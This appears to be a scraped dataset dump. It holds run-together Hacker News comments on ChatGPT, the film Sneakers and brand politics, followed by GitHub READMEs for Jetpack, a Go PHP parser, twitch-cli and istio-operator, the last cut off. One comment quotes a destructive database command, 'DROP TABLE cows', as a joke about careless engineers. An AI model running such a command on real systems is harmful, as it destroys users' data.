ChatGPT is incredibly useful in a way that no other tool has ever been, with a jump in effectiveness for natural language interaction that is mindblowingI actually think the more people use it the better it gets over time, they would use user feedback into it and make it better, I am afraid google releases a much better tool in Google.io though, just don't tell anyone.Are there any good AI models specifically designed for the \"find all discrepancies/inconsistencies between X text and Y text\" problem?It strikes me that this could solve quite a few of ChatGPT's shortcomings by providing an automatic fact-checker - let ChatGPT create statistically-probable articles, then extract claims, generate search queries likely to find online reference articles from reputable sources for those claims, then compare the original claim against the text of each reference article, and escalate to a human if any inconsistencies are found.Because it can fine-tune on specific reference resources for a specific generated text, it could prove more reliable than ChatGPT's gradual incorporation of this feedback as part of its adversarial training.My brain doesn't learn anything easily. I have to ask constant questions to the point of annoying embarrassment in class, and books of course only say what they say.So it was wonderful yesterday to pick ChatGPT's brain and just drill down asking more and more questions about a topic in biology until my brain started to get it.Assuming the answers are accurate, this is revolutionary for me personally in independent study. 
I may finally grasp so much that I missed in school.Also, when I am reading books, ChatGPT may be able to answer questions the book does not.\"Con man\" says the guy who quotes tweets as an entire article and doesn't actually say his thoughts himself.The more I work with LLMs, the more I think of them as plagiarization engines. They do to text what a bitcoin tumbler does to bitcoins: slice them up and recombine them so that it's difficult to trace any specific part of the output to any specific part of the input.It's not a perfect analogy, but it's useful in that it produces correct answers about what LLMs are and aren't good for. For example, the reason they make better chatbots than novelists is because slicing-and-recombining text from your documentation is a great way to answer customer product questions, but slicing-and-recombining text from old novels is a lousy way to write a novel.Sweet as bro.Pretty cool that GTP is hitting such a mainstream moment. Everyone I talk with about it has glazed over for years, but I guess this is finally a demo that breaks through. 100m users if reports are accurate.Of course regular folks are going to wildly overestimate GTP\u2019s current capabilities. Regular folks wildly overestimate the intelligence of their pets.ChatGPT is capable of reasoning but it has only one tool: \"thinking out loud\".If you'd like it to solve more complex problems, ask it to do it step by step, writing down the results of each step and only at the end stating the conclusion based on the previously written results. Its reasoning capabilities will improve significantly.It cannot do it \"in its head\" because it doesn't have one. All it has are previosuly generated tokens.I wrote some examples in this Twitter thread and pointed out some additional caveats: https://twitter.com/spion/status/1621261544959918080It has been a very good tool for me and it does threaten the internet with new piles of generated garbage.I've never had a tool as helpful for learning to use other (mostly software) tools. Building new ones to some extent. Other tools exist that are not for me -- I consider myself to be too absent-minded to drive something as dangerous as an automobile. It could very well be that a tool like ChatGPT is not for everyone -- if you are too gullible to use Google or social media, then this one is not for you, you should not get the driving licence for LLMs.The proliferation of garbage on the other hand may turn against more competent users as well eventually. I guess we have already falling behind of what is needed with the legal norms and internet/data ecology.Usefulness is the correct measure. ChatGPT is limited, but immediately very useful in a surprising number of ways. Compare that to the Bitcoin hype, where, even though it has had years, is still mainly useful for drug transactions and other illegal transfers.I have to admit I was a bit disappointed when I scrolled to the end and it didn't turn out this article was written by ChatGPT.This article reminds me of some guy on Twitter who says nothing in AI space has changed since 2020.Maybe so.But you know what\u2019s changed? Someone decided to get their a$$ out of the AI labs, write a really simple interface just to \u201cget it up\u201d and released it to the world.That definitely will trump anything else.Release early and release often.The author is just jealous.After having played it ChatGPT for a bit, mostly asking computer questions, I've had mixed results. 
Some are amazing, others are gibberish.But what struck me the other day is a couple of quotes from, of all things, Galaxy Quest which seem particularly apt. \"May I remind you that this man is wearing a costume, not a uniform.\"\n\nand \"You know, with all that makeup and stuff, I actually thought you were SMART for a second.\"\n\nAs amazing as it is, as progressive as it is, it's still a magic trick.The thing that makes me nervous about it isn't ChatGPT or other LLMs, really. It's that people seem to be easily fooled by them into thinking it's something more than it is. The comments from the most ardent fans imply that it's doing reasoning or is a step in the direction of AGI, when it's not that at all.Just another clickbait articleWhen will it demonstrate passing the Turing Test?I feel the answer is not which year, but which month of 2023Is it just me or are peoples expectations of chatGPT absolutely ridiculous?No it's not a magic oracle. Yes you still have to check your work. Yes it will make mistakes.But as a tool to assist you? It's incredible.Part of me thinks one of the big reasons Google has held back so much is because of ethical concerns and/or just general fear of not having complete knowledge of how AI (incomplete to boot) will impact the world. We know that Google has some extremely powerful AI, but they never let it out of the lab. Just the most heavily neutered and clamped versions to help accentuate their existing products.Now it seems that Open.AI/Microsoft are ready to jump in, caution to the wind. As you would expect the chance for a competitive advantage will always overwhelm external concerns.We'll see what Google does. They might say \"fuck it\" and finally give us a chance to play with whatever their top tier AI is. Or maybe they'll discredit it and try and compete with their current (ad optimized) search product. We'll see, but I am definitely curious to see how Google responds to all this.You can call it a con all you want but I have personally extracted a lot of value from ChatGPT. It _really_ made a difference in launching in a product in record time for me. It also taught me a bunch of things I would have otherwise never discovered.But go on calling it a con because it failed your arbitrary line in the sand question.I had a detailed conversion with chatGPT about how to gracefully handle terminating conditions of a rust program. It summarized cogently to register at_exit()\u2019s for each thread, panic handlers, and register signal handlers. It advised and explain in detail on my query about the thread handling for each of these variants, gave really helpful advice on collecting join handles in a closure on the main thread and waiting for the child threads to exit their at_exit handlers since at_exit can\u2019t guarantee when handlers will execute. It went into detail about cases the process won\u2019t have the ability to clean up. I was able to ask it a lot of clarifying questions and it provided useful responses with clear coherent explanations that were salient and considered the full context of the discussion. I\u2019m certain when I go to actually implement it it\u2019ll have gotten so details wrong. 
But it provided about as clear explanation of process termination mechanics (for Unix) as I\u2019ve seen articulated, and did so in a way that was directed by my questions not in a 300 page reference manual or random semi relevant questions in stackoverflow answered by partially right contributors.If this is a con, then consider me a mark.The thing that surprises me is all the people saying that it generates correct sql statements, excel macros, code snippets, etc. Is there so much code on the Internet that it is able to do a good job at this kind of task?My stance is pretty simple.The folks that adapt their own language centers and domain reasoning around using chatGPT (or these types of models) will stand to gain the most out of using them.This article is an eye roll to me, a calculator gives you confidence as well, doesn't mean you used it correctly.It is very hard for me to not outright dismiss articles like this that don't consider the usefulness of the tool. They instead search for every possible way to dismiss the tool.>My conclusion isn\u2019t just that ChatGPT is another con game\u2014it\u2019s the biggest one of them all.* YAAAAAWN *I think \"con artist\" isn't too far off, but \"dream simulator\" also applies.I think it's kind of an open question: can we learn anything from dreams? It's likely a yes, though I doubt we'll prove the Riemann hypothesis with it or anything like that.I found 10 tweets to backup my anecdotal argument but it gave me enough confidence to rant about chatgpt. If twitter is your source of data, how are you doing anything different from chatgpt? All I'm getting from this piece is that this person has a fundamental misunderstanding of why people are finding chatgpt useful.Too harsh!ChatGPT is lossily compressed knowledge of humanity collected on the Internet.And it can talk! That's extremely new for us poor hoomans and so we get extremely excited.I found out, it gets about one in ten things wrong. When this happens it spews confident bullshit and when I confront it, it cheerily admits that it was wrong, but can continue to produce further bullshit. I understand the comparison to a con man.Don\u2019t be afraid of ChatGPT but don\u2019t underestimate what it and others like it will be capable of as it is iterated on. You found one category of prompt that needs some iteration. Good job, if the team wasn\u2019t aware of this already, hopefully you helped point it out.It\u2019s not that the technology isn\u2019t capable of what you\u2019re asking, it just needs better training for this class of question.There are other things like generating and translating code that it excels on. I imagine that would be much harder. But we have great data to train for that and the engineers know enough to dogfood that properly.The way I've come to look at ChatGPT is via a D&D analogy.It's like a helpful Bard with 1 rank in all the knowledge skills and a good bluff roll.It'll give you good answers to a lot of basic queries, but if it doesn't know, it'll just make up something and provide that.Once you know that, I think it can be a lot of use and in many way, I think it'll get a lot better with time.I've already found it useful in basic programming tasks, specifically where I know how to do something in one language but not another, it can give me the equivalent code easily.All these articles really sound like \u201cI used an apple to hammer in a screw and it sucked. This has to be the worst plant-based object ever made\u201d. It\u2019s a common junior engineer approach. 
\u201cI broke our database by running DROP TABLE cows in the console\u201d. Yeah, dude, that\u2019s possible. Just don\u2019t do that.The point of tools isn\u2019t to use them like Homer Simpson. But you know what, it doesn\u2019t matter. Stay behind. Everyone else is going on ahead.I think we have to remember that ChatGPT is often a reflection of us, based its training.If I Google for a particular answer and the answer I come across is wrong, then the person who wrote that was wrong and Google served me a website that was wrong. This is the world we live in, where it is up to me to decide what is right or wrong based on what is put in front of me.If I use ChatGPT for a particular answer and the answer I come across is wrong, then the training of the GPT needs to be improved. What I can't do with ChatGPT is tell where the answer came from or the amount of confidence GPT has in its answer for me to make a more informed decision around whether there might be caveats.I have used it and have had to edit almost everything its provided, but it has helped me be sometimes 80% more efficient at what I need to achieve.In the end, people just need to be more aware of the fact that it is after all not a full proof product and may never be. It will have its shortcomings as it quite clearly displays on its website before you enter a query.If you use it as gospel and it leads you down the wrong path, then you only have yourself to blame.I don't understand why people are throwing a fit over this version of ChatGPT. Yes, it has problems but to me this is just a demonstration. I think this will be great for specialized cases like tech writing, requirements and system configuration. It could check requirements for consistency, test coverage and translate YAML config into something easier to understand. It could also look at your code and describe the design and point out problems.I can't wait for AI to assist in these tasks. It's time.Don\u2019t lose sight of the forest for the trees. ChatGPT is a tree, the vanguard, an experiment. There is much, much more to come, I believe.*beep*ChatGPT is a masterpiece. To code something from scratch that can do everything it does at the proficiency it does is impossible. Insane how quickly people take something for granted.The people who don't see the value in generating language that has a purpose outside of narrow niche of communicating facts will be let down for some time. This feels very Wittgenstein's Tractatus. There are so many other ways that we use language.I have a simple canary for ChatGPT correctness that I ask every time it's updated: \"What can you tell me about Ice Cold In Alex?\" / \"Who did Sylvia Syms play?\"I'm not expecting it to get the answer right (I don't think it has that information) but I'm hoping it'll eventually just admit it doesn't know instead of making up something plausible (\"Sister Margaret Parker\" last time I tried).As long as it doesn't know what it doesn't know, I'm inclined to think of it as a super-advanced Markov chain. Useful, impressive, but still basically a statistical trick.That's something I'd remember next time I'm looking at motherboards.ASRock's response to a Reddit post: https://www.reddit.com/r/ASRock/comments/xrdvnk/infuriating_...Can someone elaborate for me on the \"memory training\" responsible for the long initial boot times the sticker warns about?I skimmed this https://www.asset-intertech.com/resources/blog/2014/11/memor... and it sounds like a crutch for marginal silicon. 
How's it compare to Memtest86 and the like?It's called a manual! Print it and read it!Still one of my all time favourite movies.Be sure to check out this delightful article about a guy trying - and succeeding - to find the actual building of the \"toy company\" from the movie:https://mwichary.medium.com/toy-company-my-ass-421842476d06I really enjoyed Sneakers but I still visibly cringe whenever I hear this line:> A computer matched her with him? I don't think soFor me the pinnacle of how hacking is represented on the screen is Mr Robot by far.I love this movie, a staple of music childhood. My sister and I still make references to it.The various shooting locations around SF are cool, the meeting where he figures out they're not NSA is outside the Wharton building on the Embarcadero, my wife and I bike by every week.Such a great movie. One of the best hacking-related movies ever made for me personally.Related:\u200eCracking the Code: Sneakers at 30 - https://news.ycombinator.com/item?id=31378418 - May 2022 (76 comments)Memories of the \u201cSneakers\u201d Shoot (2012) - https://news.ycombinator.com/item?id=29840802 - Jan 2022 (198 comments)Sneakers: Robert Redford, River Phoenix nerd out in 1992\u2019s prescient caper - https://news.ycombinator.com/item?id=29620095 - Dec 2021 (7 comments)Sneakers (1992), the Film - https://news.ycombinator.com/item?id=26111977 - Feb 2021 (2 comments)Tool Recreating the \u201cDecrypting Text\u201d Effect Seen in the Movie \u201cSneakers\u201d - https://news.ycombinator.com/item?id=11643270 - May 2016 (54 comments)Sneakers - movie about pen testing, crypto/nsa, espionage, and deception (1992) - https://news.ycombinator.com/item?id=6196379 - Aug 2013 (5 comments)What it was like shooting the movie Sneakers - https://news.ycombinator.com/item?id=4498985 - Sept 2012 (46 comments)Sneakers (Film, 1992) - https://news.ycombinator.com/item?id=1499298 - July 2010 (1 comment)Joybubbles: the blind phreaker whom Whistler was based off of in Sneakers - https://news.ycombinator.com/item?id=1443241 - June 2010 (1 comment)It was not far ahead of its time. It was relevant then.It's still relevant-ish now, though the left-leaning hackers would likely embrace state agents in our own day and age. The bully would have to be a foreign adversary.Michael Selvidge has a fun Twitter thread with Sneakers info: https://twitter.com/selviano/status/1568298272900673538 / https://nitter.net/selviano/status/1568298272900673538It's worth noting that the War Games writers Lawrence Lasker and Walter F. Parkes paired up again on Sneakers where Lasker was a writer and Parkes was a producer.They shaped an entire generation of of geeks' thinking by telling good, accurate (if embellished) stories.My favorite Easter egg is the title as anagram for \u201cNSA reeks\u201dThey included some good clips, but they missed one of my favorite scenes: Navigating by Sound: https://www.youtube.com/watch?v=KuIheGaiFLMHuh:https://archive.org/details/Sneakers_Film_Promotional_Floppy (with inline emulator)Released in conjuction with the computer hacking movie \"Sneakers\" (1992), this floppy-based \"computer press kit\" contained many of the aspects of regular movie press kits, including cast bios, plots, and information on all aspects of production. 
It was intended for press, and as such is both \"locked up\" (via passwords) but also endeavored to help the same press get through the barriers as quickly as possible.The balancing act between technical complexity and simplicity to ensure promotion is quite notable.The program in question is DOS-based, and was released in 1992 as part of a package of both written and computer-based information.It was a great movie except for the bits making Republicans and Nixon out to be bad. They're no worse than any Democrat. Other than than, great movie.If dang or someone could edit my original title submission to fit the field it would be great. It would seem that the Android client I'm using truncates titles without warning.A solid movie with a solid soundtrack that isn't available on Spotify. There's a long tail out there that streaming services don't have and it's a bummer.One of the few movies with a mathematical consultant: Leonard Adleman -- The \"A\" in RSAIt really is an excellent movie, and understand that social engineering is the heart of hacking.Sneakers is in a league of its own.We've been desperate for more films of this type and quality ever since. Mr Robot was the only thing that came close in the first season.There must be a bunch of obscure B movies containing authentic tech/hacking/social engineering methods that just fly under the radar. Anyone know of a list?Slate on the 20th anniversaryhttps://www.metafilter.com/119793/Slate-celebrates-the-20th-...If someone is openly taking your money for the stuff they make and giving it to people who are pretty open about wanting to make your life worse, then they shouldn't be surprised if you quit buying their stuff. Actions have consequences, and being filthy rich shields you from some of them, but not all of them.And sometimes choosing to not take a side is, in fact, an action with distinct consequences.Here I thought the progressive ideology would be to not buy Nike's because they are overpriced garbage that has a history of questionable manufacturing processes. Professional sports in many ways are like the cornerstone of capitalism.And yet, Nike's sales surged when they brought on Kaepernick> Despite Fox News and parts of the social mediasphere predicting the Swoosh\u2019s downfall, the company claimed $163 million in earned media, a $6 billion brand value increase, and a 31% boost in sales.https://www.fastcompany.com/90399316/one-year-later-what-did...If I were running a business ethically, I'd want to mute my criticism of politics, including fairly extreme ones. Partisanship is tearing the world apart. I want people with different viewpoints to interact. That's the only way to address them. If we don't work together and we don't shop together, we'll grow more polarized as a result. Democracy isn't a battle, and you win by convincing people, and not by beating them down or punishing them. That means interacting with them.A business isn't a good venue for partisan change. It is an okay place for some types of politics (e.g. environmental sourcing), but not for explicitly partisan ones.Ironically, if I were running a business efficiently, I'd probably want to pick one side and stick to it. 
If I sell to everyone, and I have competitors who focus on the blue tribe and ones who focus on the red tribe, they'll have a competitive advantage over me with any given consumer, and I'll be left with the very few people who aren't on either side.> Years later, for many, Jordan\u2019s brand is intrinsically tied to this choice.I really dislike this kind of journalism. How many is \"many\"? Is it just the author and their circle? Is it just people who insist that everything is political? I think this is a lazy assertion, which is a shame because I enjoyed the content that followed it. Surely there's a better introduction available.> Our desire to be in tribes feels natural.People need to realize the consequences of this because it is the go-to tool for manipulating people. Creating division is creating tribes that people can belong to (and, by extension, another tribe they can blame for their problems). Racism, sexism, immigrants, homophobia and transphobia are obvious examples.But there's a way more pervasive version of this: the myth of the middle class. The middle class is propaganda to create division between the completely made up middle class and the completely made up lower class.> Workplace preferences see co-partisan workers paid more and promoted faster, despite at times being less qualified.In tech we call this \"culture fit\" and it's pervasive and real.> Republicans are more entrepreneurial. Conservatives start more firms than liberals ...Is this adjusted for socioeconomic conditions?The positive framing of this phenomenon is strange. Someone muting his criticism against an open segregationist because his voters buy sneakers is probably one of the more cartoonish examples of market logic and self-interest crowding out people's values.And I mean this even in a value neutral sense in regards to the topic itself. It's as if a devout Christian would start selling abortion pills or a pacifist became an arms dealer.When the article uses the phrase 'tribalism' it seems to me they just mean 'political'. People have started to prioritize values over economic calculus again after the monoculture of the 90s, which this kind of a thing was a product of.> A series of surveys suggests that people who identify as conservative are more likely to want to do this by buying products marketed as \u201cbetter,\u201d while liberals are more drawn to messaging that emphasizes that the product is \u201cdifferent.\u201d\u201dthis is interesting. I would be more drawn to messaging on \"different\", but mostly because I wouldn't trust a company to be an impartial judge on what is \"better\" - I would look to reviews rather than marketing for that. I guess it also represents a difference in notions of black and white thinking as well. I'd be curious to hear which one appeals more to people and why.Another good memo - less controversial :) https://news.ycombinator.com/item?id=32513917Slytherin Buy Sneakers TooBusinesses are supposed to be separate entities from the individuals who own them. I don't understand why people think businesses need to be political. If that's the case then just start your own Political Action Committee.The woke-PR institutions that are meant to be criticized by this already account for it. 
Companies that sell direct-to-consumer are not trying to outwoke each other, they're resting in the same moderate, optimistic, positive, there are well-intentioned people on both sides place they always were.Where you see the aggressive enforcement of woke sentiment is within industries who are fighting regulation. To think about Republican voters (not politicians, who are of course important for them) is wasted time. All of them are going to vote for politicians who will not regulate these companies, no matter how their base feels about the companies and their messaging. Their Democratic politicians, however, could be voted out and replaced with eager regulators for helping a company that has been cancelled.Instead of thinking about regulation, it's important that the Democratic voter ask: \u201cIf we broke up the big banks tomorrow... would that end racism? Would that end sexism?\u201di.e. Their Dem politicians need to be protected, their Republican politicians do not.There's a meme, where someone goes on a rant in the wrong location and someone responds \"Sir, this is a Wendy's\".Maybe we need one for \"Sir, this company sells shoes\". It isn't clear to me why a person trying to sell shoes needs to take a stand about one politician or another. Except for the fact that there is only one thing partisans hate more than their enemies - the people who aren't part of the partisan fray.Picture, seeing as Bloomberg didn't bother:\nhttps://www.roboticsandinnovation.co.uk/wp-content/uploads/2...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "3ofcoins/jetpack", "link": "https://github.com/3ofcoins/jetpack", "tags": [], "stars": 528, "description": "**PROTOTYPE** FreeBSD Jail/ZFS based implementation of the Application Container Specification", "lang": "Go", "repo_lang": "", "readme": "> **WARNING:** This software is new, experimental, and under heavy\n> development. The documentation is lacking, if any. There are almost\n> no tests. The CLI commands, on-disk formats, APIs, and source code\n> layout can change in any moment. Do not trust it. Use it at your own\n> risk.\n>\n> **You have been warned**\n\nJetpack\n=======\n\nJetpack is an **experimental and incomplete** implementation of the\n[App Container Specification](https://github.com/appc/spec) for\nFreeBSD. It uses jails as isolation mechanism, and ZFS for layered\nstorage.\n\nThis document uses some language used in\n[Rocket](https://github.com/coreos/rocket), the reference\nimplementation of the App Container Specification. While the\ndocumentation will be expanded in the future, currently you need to be\nfamiliar at least with Rocket's README to understand everything.\n\nCompatibility\n-------------\n\nJetpack is developed and tested on an up-to-date FreeBSD 10.1 system,\nand compiled with Go 1.4. Earlier FreeBSD releases are not supported.\n\nGetting Started\n---------------\n### VM with vagrant\nTo spin up a pre configured FreeBSD VM with [Vagrant](https://www.vagrantup.com)\n\nMake sure you have [ansible](http://docs.ansible.com/intro_installation.html#getting-ansible) installed on the host system.\n\nThen boot and provision the VM by running `$ vagrant up` in the root directory of this repository.\nRun `$ vagrant ssh` to ssh into the machine. \nThe code is mounted under `/vagrant`.\n\n### Configuring the system\n\nFirst, build Jetpack and install it (see the [INSTALL.md](INSTALL.md)\ndocument for installation instructions).\n\nYou will obviously need a ZFS pool for Jetpack's datasets. 
By default,\nJetpack will create a `zroot/jetpack` dataset and mount it at\n`/var/jetpack`. If your zpool is not named _zroot_, or if you prefer\ndifferent locations, these defaults can be modified in the\n`jetpack.conf` file.\n\nYou will need a user and group to own the runtime status files and\navoid running the metadata service as root. If you stay with default\nsettings, the username and group should be `_jetpack`:\n\n pw useradd _jetpack -d /var/jetpack -s /usr/sbin/nologin\n\n> **Note:** If you are upgrading from an earlier revision of Jetpack,\n> you will need to change ownership of files and directories:\n> `chgrp _jetpack /var/jetpack/pods/* /var/jetpack/images/*\n> /var/jetpack/*/*/manifest && chmod 0440 /var/jetpack/*/*/manifest`\n\nYou will also need a network interface that the jails will use, and\nthis interface should have Internet access. By default, Jetpack uses\n`lo1`, but this can be changed in the `jetpack.conf` file. To create\nthe interface, run the following command as root:\n\n ifconfig lo1 create inet 172.23.0.1/16\n\nTo have the `lo1` interface created at boot time, add the following\nlines to `/etc/rc.conf`:\n\n cloned_interfaces=\"lo1\"\n ipv4_addrs_lo1=\"172.23.0.1/16\"\n\nThe main IP address of the interface will be used as the host\naddress. Remaining addresses within its IP range (in this case,\n172.23.0.2 to 172.23.255.254) will be assigned to the pods. IPv6\nis currently not supported.\n\nThe simplest way to provide internet access to the jails is to NAT the\nloopback interface. A proper snippet of PF firewall configuration\nwould be:\n\n set skip on lo1\n nat pass on $ext_if from lo1:network to any -> $ext_if\n\nwhere `$ext_if` is your external network interface. A more\nsopihisticated setup can be desired to limit pods'\nconnectivity. In the long run, Jetpack will probably manage its own\n`pf` anchor.\n\nYou will need to create a `jetpack.conf` file (by default,\n`/usr/local/etc/jetpack.conf`) with at least following settings:\n\n mds.signing-key = RANDOM_HEX_KEY\n mds.token-key = RANDOM_HEX_KEY\n\nYou can generate random hex keys by running `openssl rand -hex 32` and\npasting its output.\n\n### Using Jetpack\n\nRun `jetpack` without any arguments to see available commands. Use\n`jetpack help COMMAND` to see detailed help on individual commands.\n\nTo initialize the ZFS datasets and directory structure, run `jetpack\ninit`.\n\nTo get a console, run:\n\n jetpack run -t 3ofcoins.net/freebsd-base\n\nThis will fetch our signing GPG key, then fetch the FreeBSD base ACI,\nand finally run a pod and drop you into its console. After you exit\nthe shell, run `jetpack list` to see the pod, and `jetpack destroy\nUUID` to remove id.\n\nRun `jetpack images` to list available images.\n\nYou create pods from images, then run the pods:\n\n jetpack prepare 3ofcoins.net/freebsd-base\n\nNote the pod UUID printed by the above command (no user-friendly pod\nnames yet) or get it from the pod list (run `jetpack list` to see the\nlist). Then run the pod:\n\n jetpack run -t $UUID\n\nThe above command will drop you into root console of the pod. After\nyou're finished, you can run the pod again. 
Once you're done with the\npod, you can destroy it:\n\n jetpack destroy $UUID\n\nYou can also look at the \"showenv\" example:\n\n make -C images/example.showenv\n jetpack prepare example/showenv\n jetpack run $UUID\n\nTo poke inside a pod that, like the \"showenv\" example, runs a useful\ncommand instead of a console, use the `console` subcommand:\n\n jetpack console $UUID\n\nRun `jetpack help` to see info on remaining available commands, and if\nsomething needs clarification, create an issue at\nhttps://github.com/3ofcoins/jetpack/ and ask the question. If\nsomething is not clear, it's a bug in the documentation!\n\n#### Running the Metadata Service\n\nTo start the metadata service, run `$(jetpack config path.libexec)/mds`.\n\nBuilding Images\n---------------\n\nSee the [IMAGES.md](IMAGES.md) file for details. Some example image\nbuild scripts (including the published `3ofcoins.net/freebsd-base`\nimage) are provided in the `images/` directory.\n\nFeatures, or The Laundry List\n-----------------------------\n\n - Stage0\n - [x] Image import from ACI\n - [x] Image building\n - [x] Clone pod from image and run it\n - [ ] Full pod lifecycle (Stage0/Stage1 interaction)\n - [x] Multi-application pods\n - [x] Image discovery\n - Stage1\n - [x] Isolation via jails\n - [x] Volumes\n - [x] Multi-application pods\n - [ ] Firewall integration\n - [x] Metadata endpoint\n - [ ] Isolators\n - Stage2\n - [x] Main entry point execution\n - [x] Setting UID/GID\n - [x] Setting environment variables\n - [x] Event Handlers\n - [ ] Isolators\n - CLI\n - [X] Specify image/pod by name & labels, not only UUID\n - [x] Consistent options for specifying application options (CLI,\n JSON file)\n - General TODO\n - [x] Refactor the Thing/ThingManager/Host sandwich to use embedded\n fields\n - [ ] CLI-specified types.App fields for custom exec, maybe build\n parameters too?\n - [ ] Live, movable \"tags\" or \"bookmarks\", to mark e.g. latest\n version of an image without need to modify its\n manifest. Possible search syntax: `name@tag1,tag2,\u2026`, where a\n tag is an ACName, so it may be also a key/value pair like\n `environment/production`.\n - [ ] Maybe some variant of tags that would be unique per\n name?\n - [ ] `/etc/rc.d/jetpack` (`/etc/rc.d/jetpack_` for individual\n pods?) to start pods at boot time, and generally\n manage them as services\n - [ ] Port to install Jetpack system-wide\n - If/when we get enough live runtime data to make it complicated,\n maybe a centralized indexed storage, like SQLite? This could also\n solve some locking issues for long-running processes\u2026\n", "readme_type": "markdown", "hn_comments": "Please call it something else. Mozilla's plug-in API is called \"Jetpack\". Thanks.I would use this, I really would, but the problem I have with ZFS RAID-Z1 and 2 shares, once you setup the storage pool, you can't dynamically add hard drives to the pool, you have to set it up weirdly like RAIDZ-1+1. All I want to do is add more storage to my 5TB pool without having to wipe it all or change the configuration to something else because I want to add a hard drive.Maybe it's better to help that one guy work on cbsd? http://www.bsdstore.ru/en/about.htmlThe best alternative:\nhttp://www.7he.at/freebsd/vps/Jails aren't that great:\nhttps://aboutthebsds.wordpress.com/2013/01/13/freebsd-jails-...But there is Capsicum too:\nhttp://lwn.net/Articles/482858/I'm still working on a generalized system (not OS specific), with ZFS support in there and working. 
Have begun discussions about open sourcing this with management. In theory it will let people go 'show me this thing on platform and platform, benchmarked'. Platform strengths will then speak for themselves, and platform maintainers will have the same version/build/evaluate loop that regular service developers use. http://stani.sh/walter/pfcts/This looks interesting, I'm still holding my breath to see if Joyent are going to bring zfs support to docker though. It looks like they're working on reviving lx branded zones instead which is a bit of a bummer as they are (or were) pretty terrible.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "stephens2424/php", "link": "https://github.com/stephens2424/php", "tags": ["go", "parse", "php", "parser-php"], "stars": 528, "description": "Parser for PHP written in Go", "lang": "Go", "repo_lang": "", "readme": "php\n===\n\nArchived: This project only supported PHP 5, and never matured beyond a basic parser and AST visualizer. Since I lost interest, it has fallen into disrepair, beyond the more conventional bugs.\n\n---\n\nParser for PHP written in Go\n\nSee [this post](https://stephensearles.com/ive-got-all-this-php-now-what-parsing-php-in-go/) for an introduction.\n\n[![Build Status](https://travis-ci.org/stephens2424/php.svg)](https://travis-ci.org/stephens2424/php) [![GoDoc](https://godoc.org/github.com/stephens2424/php?status.svg)](https://godoc.org/github.com/stephens2424/php)\n\nTest console:\n\n[![console](https://stephensearles.com/wp-content/uploads/2014/07/Screen-Shot-2014-07-27-at-12.02.32-PM.png)](https://phpconsole.stephensearles.com)\n\n## Project Status\n\nThis project is under heavy development, though some pieces are more or less stable. Listed here are components that in progress or are ideas for future development\n\nFeature |Status\n------------------------------|------\nLexer and Parser | mostly complete. there are probably a few gaps still\nScoping | complete for simple cases. probably some gaps still, most notably that conditional definitions are treated as if they are always defined\nCode search and symbol lookup | basic idea implemented, many many details missing\nCode formatting | basic idea implemented, formatting needs to narrow down to PSR-2\nTranspilation to Go | basic idea implemented, need follow through with more node types\nType inferencing | not begun\nDead code analysis | basic idea implemented, but only for some types of code. 
Also, this suffers from the same caveats as scoping\n\n## Project Components\n\nDirectory |Description\n------------------------------|------\nphp/ast| (abstract syntax tree) describes the nodes in PHP as parsed by the parser\nphp/ast/printer| prints an ast back to source code\nphp/cmd| a tool used to debug the parser\nphp/lexer| reads a stream of tokens from source code\nphp/parser| the core parser\nphp/passes| tools and packages related to modifying or analyzing PHP code (heavily a work in progress)\nphp/passes/togo| transpiler\nphp/passes/deadcode| dead code analyzer\nphp/query| tools and packages related to analyzing and finding things in PHP code (heavily a work in progress)\nphp/testdata| simple examples of PHP that must parse with no errors for tests to pass\nphp/token| describes the tokens read by the lexer\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "twitchdev/twitch-cli", "link": "https://github.com/twitchdev/twitch-cli", "tags": ["cli", "twitch"], "stars": 527, "description": "The official Twitch CLI to make developing on Twitch easier.", "lang": "Go", "repo_lang": "", "readme": "# Twitch CLI \n\n- [Twitch CLI](#twitch-cli)\n - [Download](#download)\n - [Homebrew](#homebrew)\n - [Scoop](#scoop)\n - [Manual Download](#manual-download)\n - [Usage](#usage)\n - [Commands](#commands)\n - [Contributing](#contributing)\n - [License](#license)\n\n## Download\n\nThere are two options to download/install the Twitch CLI for each platform. \n\n### Homebrew\n\nIf you are using MacOS or Linux, we recommend using [Homebrew](https://brew.sh/) for installing the CLI as it will also manage the versioning for you. \n\nTo install via Homebrew, run `brew install twitchdev/twitch/twitch-cli` and it'll be callable via `twitch`. \n\n### Scoop\n\nIf you are using Windows, we recommend using [Scoop](https://scoop.sh/) for installing the CLI, as it'll also manage versioning. \n\nTo install via Scoop, run: \n\n```sh\nscoop bucket add twitch https://github.com/twitchdev/scoop-bucket.git\nscoop install twitch-cli\n```\n\nThis will install it into your path, and it'll be callable via `twitch`. \n\n### Manual Download\n\nTo download, go to the [Releases tab of GitHub](https://github.com/twitchdev/twitch-cli/releases). The examples in the documentation assume you have put this into your PATH and renamed to `twitch` (or symlinked as such).\n\n**Note**: If using MacOS and downloading manually, you may need to adjust the permissions of the file to allow for execution.\n\nTo do so, please run: `chmod 755 ` where the filename is the name of the downloaded binary. 
\n\n## Usage\n\nThe CLI largely follows a standard format: \n\n```sh\ntwitch \n```\n\nThe commands are described below, and any accompanying args/flags will be in the accompanying subsections.\n\n## Commands\n\nThe CLI currently supports the following products: \n\n- [api](./docs/api.md)\n- [configure](./docs/configure.md)\n- [event](docs/event.md)\n- [mock-api](docs/mock-api.md)\n- [token](docs/token.md)\n- [version](docs/version.md)\n\n## Contributing\n\nCheck out [CONTRIBUTING.md](./CONTRIBUTING.md) for notes on making contributions.\n\n## License \n\nThis library is licensed under the Apache 2.0 License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "banzaicloud/istio-operator", "link": "https://github.com/banzaicloud/istio-operator", "tags": ["istio", "service-mesh", "kubernetes", "kubernetes-operator", "golang"], "stars": 527, "description": "An operator that manages Istio deployments on Kubernetes", "lang": "Go", "repo_lang": "", "readme": "# Istio operator\n\nIstio operator is a Kubernetes operator to deploy and manage [Istio](https://istio.io/) resources for a Kubernetes cluster.\n\n## Overview\n\n[Istio](https://istio.io/) is an open platform to connect, manage, and secure microservices and it is emerging as the `standard` for building service meshes on Kubernetes.\n\nThe goal of the **Istio-operator** is to enable popular service mesh use cases (multi cluster topologies, multiple gateways support etc) by introducing easy to use higher level abstractions.\n\n## In this README\n\n- [Istio operator](#istio-operator)\n - [Overview](#overview)\n - [In this 